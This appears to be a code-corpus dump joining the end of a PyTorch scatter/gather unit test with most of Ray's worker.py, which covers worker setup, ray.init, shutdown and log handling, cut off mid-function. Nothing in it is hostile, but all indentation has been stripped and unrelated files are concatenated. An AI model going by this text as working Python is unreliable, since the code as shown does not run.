# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
worker.py
|
from contextlib import contextmanager
import colorama
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Dict, List, Iterator
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray.gcs_utils
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.services as services
import ray._private.runtime_env as runtime_env
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
import ray
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
from ray import profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import _random_string, check_oversized_pickle
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import _internal_kv_get, \
_internal_kv_initialized
from ray._private.client_mode_hook import client_mode_hook
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
UTIL_WORKER_MODE = 5
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
logger.error("Unhandled error (suppress with "
"RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
self.node = None
self.mode = None
self.cached_functions_to_run = []
self.actors = {}
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
self.memory_monitor = memory_monitor.MemoryMonitor()
# A dictionary that maps from driver id to SerializationContext
# TODO: clean up the SerializationContext once the job finished.
self.serialization_context_map = {}
self.function_actor_manager = FunctionActorManager(self)
# This event is checked regularly by all of the threads so that they
# know when to exit.
self.threads_stopped = threading.Event()
# Index of the current session. This number will
# increment every time when `ray.shutdown` is called.
self._session_index = 0
# If this is set, the next .remote call should drop into the
# debugger, at the specified breakpoint ID.
self.debugger_breakpoint = b""
# If this is set, ray.get calls invoked on the object ID returned
# by the worker should drop into the debugger at the specified
# breakpoint ID.
self.debugger_get_breakpoint = b""
self._load_code_from_local = False
# Used to toggle whether or not logs should be filtered to only those
# produced in the same job.
self.filter_logs_by_job = True
@property
def connected(self):
"""bool: True if Ray has been started and False otherwise."""
return self.node is not None
@property
def node_ip_address(self):
self.check_connected()
return self.node.node_ip_address
@property
def load_code_from_local(self):
self.check_connected()
return self._load_code_from_local
@property
def current_job_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_current_job_id()
return JobID.nil()
@property
def actor_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_actor_id()
return ActorID.nil()
@property
def current_task_id(self):
return self.core_worker.get_current_task_id()
@property
def current_node_id(self):
return self.core_worker.get_current_node_id()
@property
def namespace(self):
return self.core_worker.get_job_config().ray_namespace
@property
def placement_group_id(self):
return self.core_worker.get_placement_group_id()
@property
def should_capture_child_tasks_in_placement_group(self):
return self.core_worker.should_capture_child_tasks_in_placement_group()
@property
def current_session_and_job(self):
"""Get the current session index and job id as pair."""
assert isinstance(self._session_index, int)
assert isinstance(self.current_job_id, ray.JobID)
return self._session_index, self.current_job_id
@property
def runtime_env(self):
"""Get the runtime env in json format"""
return json.loads(
self.core_worker.get_job_config().runtime_env.raw_json)
def get_serialization_context(self, job_id=None):
"""Get the SerializationContext of the job that this worker is processing.
Args:
job_id: The ID of the job that indicates which job to get
the serialization context for.
Returns:
The serialization context of the given job.
"""
# This function needs to be protected by a lock, because it will be
# called by`register_class_for_serialization`, as well as the import
# thread, from different threads. Also, this function will recursively
# call itself, so we use RLock here.
if job_id is None:
job_id = self.current_job_id
with self.lock:
if job_id not in self.serialization_context_map:
self.serialization_context_map[
job_id] = serialization.SerializationContext(self)
return self.serialization_context_map[job_id]
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
raise RaySystemError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
"""
self.mode = mode
def set_load_code_from_local(self, load_code_from_local):
self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None):
"""Put value in the local object store with object reference `object_ref`.
This assumes that the value for `object_ref` has not yet been placed in
the local object store. If the plasma store is full, the worker will
automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
retry will delay for an exponentially doubling amount of time,
starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
will be raised.
Args:
value: The value to put in the object store.
object_ref (ObjectRef): The object ref of the value to be
put. If None, one will be generated.
Returns:
ObjectRef: The object ref the object was put under.
Raises:
ray.exceptions.ObjectStoreFullError: This is raised if the attempt
to store the object fails because the object store is full even
after multiple retries.
"""
# Make sure that the value is not an object ref.
if isinstance(value, ObjectRef):
raise TypeError(
"Calling 'put' on an ray.ObjectRef is not allowed "
"(similarly, returning an ray.ObjectRef from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ray.ObjectRef in a list and "
"call 'put' on it (or return it).")
if self.mode == LOCAL_MODE:
assert object_ref is None, ("Local Mode does not support "
"inserting with an ObjectRef")
serialized_value = self.get_serialization_context().serialize(value)
# This *must* be the first place that we construct this python
# ObjectRef because an entry with 0 local references is created when
# the object is Put() in the core worker, expecting that this python
# reference will be created. If another reference is created and
# removed before this one, it will corrupt the state in the
# reference counter.
return ray.ObjectRef(
self.core_worker.put_serialized_object(
serialized_value, object_ref=object_ref))
def raise_errors(self, data_metadata_pairs, object_refs):
out = self.deserialize_objects(data_metadata_pairs, object_refs)
if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
return
for e in out:
_unhandled_error_handler(e)
def deserialize_objects(self, data_metadata_pairs, object_refs):
# Function actor manager or the import thread may call pickle.loads
# at the same time which can lead to failed imports
# TODO: We may be better off locking on all imports or injecting a lock
# into pickle.loads (https://github.com/ray-project/ray/issues/16304)
with self.function_actor_manager.lock:
context = self.get_serialization_context()
return context.deserialize_objects(data_metadata_pairs,
object_refs)
def get_objects(self, object_refs, timeout=None):
"""Get the values in the object store associated with the IDs.
Return the values from the local object store for object_refs. This
will block until all the values for object_refs have been written to
the local object store.
Args:
object_refs (List[object_ref.ObjectRef]): A list of the object refs
whose values should be retrieved.
timeout (float): timeout (float): The maximum amount of time in
seconds to wait before returning.
Returns:
list: List of deserialized objects
bytes: UUID of the debugger breakpoint we should drop
into or b"" if there is no breakpoint.
"""
# Make sure that the values are object refs.
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError(
f"Attempting to call `get` on the value {object_ref}, "
"which is not an ray.ObjectRef.")
timeout_ms = int(timeout * 1000) if timeout else -1
data_metadata_pairs = self.core_worker.get_objects(
object_refs, self.current_task_id, timeout_ms)
debugger_breakpoint = b""
for (data, metadata) in data_metadata_pairs:
if metadata:
metadata_fields = metadata.split(b",")
if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
debugger_breakpoint = metadata_fields[1][len(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
return self.deserialize_objects(data_metadata_pairs,
object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function,
run_on_other_drivers=False):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
takes only one argument, a worker info dict. If it returns
anything, its return values will not be used.
run_on_other_drivers: The boolean that indicates whether we want to
run this function on other drivers. One case is we may need to
share objects across drivers.
"""
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.shake_128(pickled_function).digest(
ray_constants.ID_SIZE)
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.redis_client.setnx(b"Lock:" + key, 1)
if not function_exported:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_pickle(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.redis_client.hset(
key,
mapping={
"job_id": self.current_job_id.binary(),
"function_id": function_to_run_id,
"function": pickled_function,
"run_on_other_drivers": str(run_on_other_drivers),
})
self.redis_client.rpush("Exports", key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
def print_logs(self):
"""Prints log messages from workers on all nodes in the same job.
"""
pubsub_client = self.redis_client.pubsub(
ignore_subscribe_messages=True)
pubsub_client.subscribe(ray.gcs_utils.LOG_FILE_CHANNEL)
localhost = services.get_node_ip_address()
try:
# Keep track of the number of consecutive log messages that have
# been received with no break in between. If this number grows
# continually, then the worker is probably not able to process the
# log messages as rapidly as they are coming in.
num_consecutive_messages_received = 0
job_id_binary = ray._private.utils.binary_to_hex(
self.current_job_id.binary())
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = pubsub_client.get_message()
if msg is None:
num_consecutive_messages_received = 0
self.threads_stopped.wait(timeout=0.01)
continue
num_consecutive_messages_received += 1
if (num_consecutive_messages_received % 100 == 0
and num_consecutive_messages_received > 0):
logger.warning(
"The driver may not be able to keep up with the "
"stdout/stderr of the workers. To avoid forwarding "
"logs to the driver, use "
"'ray.init(log_to_driver=False)'.")
data = json.loads(ray._private.utils.decode(msg["data"]))
# Don't show logs from other drivers.
if (self.filter_logs_by_job and data["job"]
and job_id_binary != data["job"]):
continue
data["localhost"] = localhost
global_worker_stdstream_dispatcher.emit(data)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"print_logs: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
pubsub_client.close()
@client_mode_hook
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
worker = global_worker
worker.check_connected()
# TODO(ilr) Handle inserting resources in local mode
all_resource_ids = global_worker.core_worker.resource_ids()
assigned_ids = set()
for resource, assignment in all_resource_ids.items():
# Handle both normal and placement group GPU resources.
if resource == "GPU" or resource.startswith("GPU_group_"):
for resource_id, _ in assignment:
assigned_ids.add(resource_id)
assigned_ids = list(assigned_ids)
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
# Give all GPUs in local_mode.
if global_worker.mode == LOCAL_MODE:
max_gpus = global_worker.node.get_resource_spec().num_gpus
assigned_ids = global_worker.original_gpu_ids[:max_gpus]
return assigned_ids
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
worker = global_worker
worker.check_connected()
if _mode() == LOCAL_MODE:
raise RuntimeError(
"ray.worker.get_resource_ids() currently does not work in "
"local_mode.")
return global_worker.core_worker.resource_ids()
def get_dashboard_url():
"""Get the URL to access the Ray dashboard.
Note that the URL does not specify which node the dashboard is on.
Returns:
The URL of the dashboard as a string.
"""
worker = global_worker
worker.check_connected()
return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@client_mode_hook
def init(
address=None,
*,
num_cpus=None,
num_gpus=None,
resources=None,
object_store_memory=None,
local_mode=False,
ignore_reinit_error=False,
include_dashboard=None,
dashboard_host=ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port=None,
job_config=None,
configure_logging=True,
logging_level=logging.INFO,
logging_format=ray_constants.LOGGER_FORMAT,
log_to_driver=True,
namespace=None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction=False,
_redis_max_memory=None,
_plasma_directory=None,
_node_ip_address=ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory=None,
_memory=None,
_redis_password=ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir=None,
_lru_evict=False,
_metrics_export_port=None,
_system_config=None,
_tracing_startup_hook=None):
"""
Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases; either a Ray cluster already exists and we
just attach this driver to it or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray and all of the relevant processes, use this as follows:
.. code-block:: python
ray.init()
To connect to an existing Ray cluster, use this as follows (substituting
in the appropriate address):
.. code-block:: python
ray.init(address="123.45.67.89:6379")
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
tells the driver to detect the the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
resources: A dictionary mapping the names of custom resources to the
quantities for them available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
dashboard_port(int, None): The port to bind the dashboard server to.
Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Limit the amount of memory the
driver can use in the object store for creating objects.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
_metrics_export_port(int): Port number Ray exposes system metrics
through a Prometheus endpoint. It is currently under active
development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
Address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if "RAY_ADDRESS" in os.environ:
if address is None or address == "auto":
address = os.environ["RAY_ADDRESS"]
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
# We need to disable it if runtime env is not set.
# Uploading happens after core worker is created. And we should
# prevent default worker being created before uploading.
# TODO (yic): Have a separate connection to gcs client when
# removal redis is done. The uploading should happen before this
# one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
if driver_mode == SCRIPT_MODE and job_config:
# Rewrite the URI. Note the package isn't uploaded to the URI until
# later in the connect
runtime_env.rewrite_runtime_env_uris(job_config)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
# # Here the flag `load_code_from_local` is still True if we
# # doesn't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
# Functions to run as callback after a successful ray init.
_post_init_hooks = []
@client_mode_hook
def shutdown(_exiting_interpreter=False):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to cleanup state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
Args:
_exiting_interpreter (bool): True if this is called by the atexit hook
and false otherwise. If we are exiting the interpreter, we will
wait a little while to print any extra error messages.
"""
if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
# This is a duration to sleep before shutting down everything in order
# to make sure that log messages finish printing.
time.sleep(0.5)
disconnect(_exiting_interpreter)
# We need to destruct the core worker here because after this function,
# we will tear down any processes spawned by ray.init() and the background
# IO thread in the core worker doesn't currently handle that gracefully.
if hasattr(global_worker, "gcs_client"):
del global_worker.gcs_client
if hasattr(global_worker, "core_worker"):
del global_worker.core_worker
# Disconnect global state from GCS.
ray.state.state.disconnect()
# Shut down the Ray processes.
global _global_node
if _global_node is not None:
if _global_node.is_head():
_global_node.destroy_external_storage()
_global_node.kill_all_processes(check_alive=False, allow_graceful=True)
_global_node = None
# TODO(rkn): Instead of manually resetting some of the worker fields, we
# should simply set "global_worker" to equal "None" or something like that.
global_worker.set_mode(None)
atexit.register(shutdown, True)
# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
sys.exit(signum)
try:
ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
logger.warning("Failed to set SIGTERM handler, processes might"
"not be cleaned up properly on exit.")
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to GCS worker table.
if global_worker.mode == SCRIPT_MODE and hasattr(global_worker,
"worker_id"):
error_message = "".join(traceback.format_tb(tb))
worker_id = global_worker.worker_id
worker_type = ray.gcs_utils.DRIVER
worker_info = {"exception": error_message}
ray.state.state._check_connected()
ray.state.state.add_worker(worker_id, worker_type, worker_info)
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_to_stdstream(data):
print_file = sys.stderr if data["is_err"] else sys.stdout
print_worker_logs(data, print_file)
# Start time of this process, used for relative time logs.
t0 = time.time()
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
"""Given raw log lines from the monitor, return only autoscaler events.
Autoscaler events are denoted by the ":event_summary:" magic token.
"""
global autoscaler_log_fyi_printed
if not AUTOSCALER_EVENTS:
return
# Print out autoscaler events only, ignoring other messages.
for line in lines:
if ":event_summary:" in line:
if not autoscaler_log_fyi_printed:
yield ("Tip: use `ray status` to view detailed "
"autoscaling status. To disable autoscaler event "
"messages, you can set AUTOSCALER_EVENTS=0.")
autoscaler_log_fyi_printed = True
# The event text immediately follows the ":event_summary:"
# magic token.
yield line.split(":event_summary:")[1]
def time_string() -> str:
"""Return the relative time from the start of this job.
For example, 15m30s.
"""
delta = time.time() - t0
hours = 0
minutes = 0
while delta > 3600:
hours += 1
delta -= 3600
while delta > 60:
minutes += 1
delta -= 60
output = ""
if hours:
output += "{}h".format(hours)
if minutes:
output += "{}m".format(minutes)
output += "{}s".format(int(delta))
return output
def print_worker_logs(data: Dict[str, str], print_file: Any):
def prefix_for(data: Dict[str, str]) -> str:
"""The PID prefix for this log line."""
if data["pid"] in ["autoscaler", "raylet"]:
return ""
else:
return "pid="
def color_for(data: Dict[str, str]) -> str:
"""The color for this log line."""
if data["pid"] == "raylet":
return colorama.Fore.YELLOW
elif data["pid"] == "autoscaler":
return colorama.Style.BRIGHT + colorama.Fore.CYAN
else:
return colorama.Fore.CYAN
if data["pid"] == "autoscaler":
pid = "{} +{}".format(data["pid"], time_string())
lines = filter_autoscaler_events(data["lines"])
else:
pid = data["pid"]
lines = data["lines"]
if data["ip"] == data["localhost"]:
for line in lines:
print(
"{}{}({}{}){} {}".format(colorama.Style.DIM, color_for(data),
prefix_for(data), pid,
colorama.Style.RESET_ALL, line),
file=print_file)
else:
for line in lines:
print(
"{}{}({}{}, ip={}){} {}".format(
colorama.Style.DIM, color_for(data), prefix_for(data), pid,
data["ip"], colorama.Style.RESET_ALL, line),
file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to the output queue.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = ray.gcs_utils.RAY_ERROR_PUBSUB_PATTERN
worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
